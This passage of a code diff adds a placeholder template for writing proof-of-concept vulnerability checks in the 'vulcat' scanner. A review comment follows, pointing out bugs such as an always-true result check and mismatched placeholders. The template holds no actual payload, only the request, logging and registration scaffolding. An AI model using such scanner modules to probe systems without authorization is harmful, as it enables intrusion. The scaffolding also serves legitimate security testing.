11: 请求方式(例如 get) + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + elif payload == 1: # * 当payload为第2个时, 执行xxx操作 + res = requests.11( # ! 11: 请求方式(例如 get) + target, + timeout=self.timeout, + headers=headers, + data=data, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + + logger.logging(vul_info, res.status_code, res) # * LOG + except requests.ConnectTimeout: + logger.logging(vul_info, 'Timeout') + return None + except requests.ConnectionError: + logger.logging(vul_info, 'Faild') + return None + except: + logger.logging(vul_info, 'Error') + return None + + '''!!! + 可以自定义results中的信息, 格式: + 标题: 值(str/list/dict) + str类型: key: value的格式进行显示 + list类型: 会以key: value value value ...的格式进行显示 + dict类型: 会以↓的格式进行显示 + dict: + key1: value1 + key2: value2 + ... + ''' + if ('12'): # ! 12: 判断扫描结果 + results = { + 'Target': target, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Method': vul_info['vul_method'], + 'Payload': { + 'Url': url, + 'Path': path, + 'Data': data, + 'Cookie': 'xxx', + 'Headers': headers + } + } + return results + + def addscan(self, url): + return [ + thread(target=self.6_scan, url=url) # ! 6: 同上, POC的名称 + ] + +13 = 1() # ! 1: 同上, 类名 + +''' + # ! 13: 对象名称 + # ! 需要在vulcat/lib/initial/config.py加入对象名称, 找到以下代码并继续添加 + app_list = ['alidruid', 'airflow', 'apisix', 'cisco', 'django', 'fastjson'] + # ! 然后在vulcat/lib/core/coreScan.py引入POC, 引入方式为 + from payloads.文件名 import 对象名称 + # ! 引入完成后, 自定义POC就成功了, 可以运行vulcat试试效果 +''' \ No newline at end of file
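Review bot: The placeholder numbers in this template disagree: the POC method is `def 7_scan(self, url): # ! 7: POC的名称` but `addscan` references `self.6_scan # ! 6: 同上, POC的名称`, and slot 6 is already used for the headers comment, so someone filling in the numbers mechanically produces a method that `addscan` cannot find; the last entry should read `thread(target=self.7_scan, url=url) # ! 7: 同上, POC的名称`. The result check `if ('12'):` is always true because a non-empty string is truthy, so a copy that forgets slot 12 reports every target as vulnerable; a placeholder that fails closed, such as `if (False): # ! 12: 判断扫描结果`, is the safer default. Inside the `try`, `res` is only assigned when `payload` is 0 or 1, so a third payload reaches `logger.logging(vul_info, res.status_code, res)` with `res` unbound and is reported as 'Error' by the bare `except:`. With `class 1():` the file is not valid Python, which is fine as long as modules under payloads/ are only imported by name as the closing docstring describes, but anything that imports the whole directory would fail on it.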